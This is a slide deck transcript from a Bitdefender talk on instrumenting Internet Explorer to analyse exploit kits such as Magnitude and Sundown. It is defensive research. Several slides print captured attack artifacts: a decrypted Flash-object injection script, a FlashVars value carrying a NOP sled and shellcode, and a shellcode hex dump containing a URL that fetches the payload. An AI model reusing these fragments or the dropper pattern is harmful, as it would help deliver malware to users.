Browser Instrumentation for Exploit Analysis Mihai

Published  . 0 views
↓ Download
Browser Instrumentation for Exploit Analysis Mihai
1 / 1
Browser Instrumentation for Exploit Analysis Mihai - slide 1 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 2 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 3 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 4 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 5 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 6 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 7 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 8 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 9 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 10 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 11 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 12 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 13 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 14 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 15 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 16 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 17 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 18 of 19 Browser Instrumentation for Exploit Analysis Mihai - slide 19 of 19
Description: Browser Instrumentation for Exploit Analysis Mihai Neagu, Bitdefender About Mihai Neagu Exploit research Bitdefender Past: Cloud-based protocols Data encryption Reverse engineering Summary Exploit Kits MagnitudeCerber demo The problem

Related Topics

Download Presentation

"Browser Instrumentation for Exploit Analysis Mihai" is the property of its rightful owner. Permission is granted to download and print the materials on this website for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.

Presentation Transcript

slide1. Browser Instrumentation for Exploit Analysis Mihai Neagu, Bitdefender<br>
slide2. About Mihai Neagu – Exploit research @ Bitdefender

Past:
Cloud-based protocols
Data encryption
Reverse engineering<br>
slide3. Summary Exploit Kits
Magnitude/Cerber demo
The problem
Browser instrumentation
Sundown/Banker demo
Word of advice<br>
slide4. Exploit Kits – exploit delivery service<br>
slide5. What I’m interested in What’s the Exploit Kit
What’s the exploit
What’s the malware<br>
slide6. Exploit Demo – Magnitude/Cerber<br>
slide7. Behavior analysis – traffic inspection<br>
slide8. Behavior analysis – process activity<br>
slide9. The problem Flash Dropper has no exploit code
Where is the actual exploit?
How is Cerber downloaded and executed?

We need more in-depth inspection<br>
slide10. Something’s hidden Flash Dropper (Stage 1) decrypts Flash Exploit (Stage 2) in memory
Calls loadBytes on the decrypted bytes
Stage 2 performs the actual exploitation // decrypt
...
// execute Stage 2
this.loader.loadBytes(_loc2_); We need the contents of _loc2_, the parameter of loadBytes
We need memory inspection<br>
slide11. Browser instrumentation<br>
slide12. Browser instrumentation Dynamic HTML load
document.write()  mshtml.dll, CElement::InjectTextOrHTML

Dynamic JS load
eval()  jscript9.dll, Js::GlobalObject::DefaultEvalHelper

Dynamic object instantiation, parameters
object parameter  mshtml.dll, CPropertyBag::AddProp

Dynamic Flash load
loadBytes()  flash.dll, Loader.loadBytes

Bonus – Dry run
block payload execution  kernel32.dll, CreateProcess, WriteProcessMemory<br>
slide13. Exploit Demo – Sundown/Banker<br>
slide14. Memory dumps analysis Decrypted JS var SFfbfv = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32">';
SFfbfv = SFfbfv + '<param name="movie" value="'+ hkcgdshfkj +'" />';
SFfbfv = SFfbfv + '<param name="play" value="true"/>';
SFfbfv = SFfbfv + '<!--[if !IE]>-->';
SFfbfv = SFfbfv + '<object type="application/x-shockwave-flash" data="'+ hkcgdshfkj +'" allowScriptAccess=always width="11" height="14">';<br>
slide15. Memory dumps analysis Flash Loader object instantiation <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32">
<param name="movie" value=“…/489567945678456874356487356743256.swf" />
<param name="play" value="true"/>
<param name=FlashVars value="exec=9090909090909090909090909090909090909090909090909090909090909090909090EB7133C9648B71308B760C8B761C8B5E088B…" />
...
</object><br>
slide16. Memory dumps analysis Shellcode 0000000000: 90 90 90 90 90 90 90 90 │ 90 90 90 90 90 90 90 90 ????????????????
...
0000000120: D0 7A 2E 74 6D 70 00 21 │ 21 21 21 21 21 21 21 21 Dz.tmp !!!!!!!!!
...
0000000180: 21 21 21 21 21 21 21 FF │ 70 C7 FD DE C0 AF DA 68 !!!!!!!ÿpÇy_A_Uh
0000000190: 74 74 70 3A 2F 2F 66 76 │ 34 2E 32 32 35 32 39 31 ttp://fv4.225291
00000001A0: 32 2E 63 6F 6D 2F 7A 2E │ 70 68 70 3F 69 64 3D 31 2.com/z.php?id=1
00000001B0: 33 33 00 00 00 00 │ 33<br>
slide17. Memory dumps analysis Flash Exploit, actual exploitation public dynamic class Data4 extends DeleteRangeTimelineOperation

public static var flash78:Placement;
… Vulnerability identified
CVE-2016-4117 (Flash type confusion)<br>
slide18. Word of advice Use modern mitigations
Windows 10 – control flow guard
Chrome, Edge – powerful sandboxing features

Also use these
AdBlock – block malvertising
Backup – restore encrypted files<br>
slide19. Thanks for watching!<br>